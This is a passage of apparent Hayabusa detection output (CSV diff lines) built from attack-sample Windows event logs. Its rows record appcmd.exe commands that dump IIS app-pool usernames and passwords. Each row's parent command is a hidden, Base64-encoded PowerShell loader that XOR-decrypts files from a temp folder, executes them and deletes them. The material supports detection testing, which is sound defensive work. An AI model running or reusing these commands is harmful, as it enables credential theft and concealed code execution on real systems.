HUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:17.661 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe""  list apppool ""Filename: redirection.config"" /text:processmodel.username  :  Path: C:\Windows\System32\inetsrv\appcmd.exe  :  User: IIS APPPOOL\DefaultAppPool  :  Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe""  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:17.731 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe""  list apppool ""Filename: redirection.config"" /text:processmodel.password  :  Path: C:\Windows\System32\inetsrv\appcmd.exe  :  User: IIS APPPOOL\DefaultAppPool  :  Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe""  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:17.811 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe""  list apppool /text:processmodel.username  :  Path: C:\Windows\System32\inetsrv\appcmd.exe  :  User: IIS APPPOOL\DefaultAppPool  :  Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe""  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:17.891 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe""  list apppool /text:processmodel.password  :  Path: C:\Windows\System32\inetsrv\appcmd.exe  :  User: IIS APPPOOL\DefaultAppPool  :  Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe""  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:17.971 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe""  list apppool ""Line Number: 0"" /text:processmodel.username  :  Path: C:\Windows\System32\inetsrv\appcmd.exe  :  User: IIS APPPOOL\DefaultAppPool  :  Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe""  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential 